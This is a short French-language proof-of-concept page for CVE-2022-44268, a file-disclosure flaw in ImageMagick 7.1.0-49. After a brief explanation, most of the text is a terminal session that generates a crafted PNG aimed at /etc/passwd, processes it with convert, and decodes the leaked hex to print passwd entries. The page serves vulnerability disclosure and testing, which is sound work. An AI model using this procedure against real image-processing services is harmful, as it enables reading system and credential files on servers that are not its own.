
ImageMagick PoC LFI [CVE-2022-44268]
Les chercheurs de MetabaseQ ont découvert la CVE-2022-44268, c'est-à-dire qu'ImageMagick 7.1.0-49 est vulnérable à une divulgation d'informations. Lorsqu'il analyse une image PNG (par exemple, pour un redimensionnement), l'image résultante peut contenir le contenu d'un fichier distant arbitraire (si le binaire ImageMagick dispose des autorisations nécessaires pour le lire).
(~)>>> python3 generate.py -f "/etc/passwd" -o exploit.png
[>] ImageMagick LFI PoC - by Sybil Scan Research <[email protected]>
[>] Generating Blank PNG
[>] Blank PNG generated
[>] Placing Payload to read /etc/passwd
[>] PoC PNG generated > exploit.png
(~)>>> convert exploit.png result.png
(~)>>> identify -verbose result.png
Raw profile type, vous observerez le contenu de /etc/passwd :(~)>>> python3 -c 'print(bytes.fromhex("726f6f743a783a726f6f743---REDACTED--").decode("utf-8"))'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin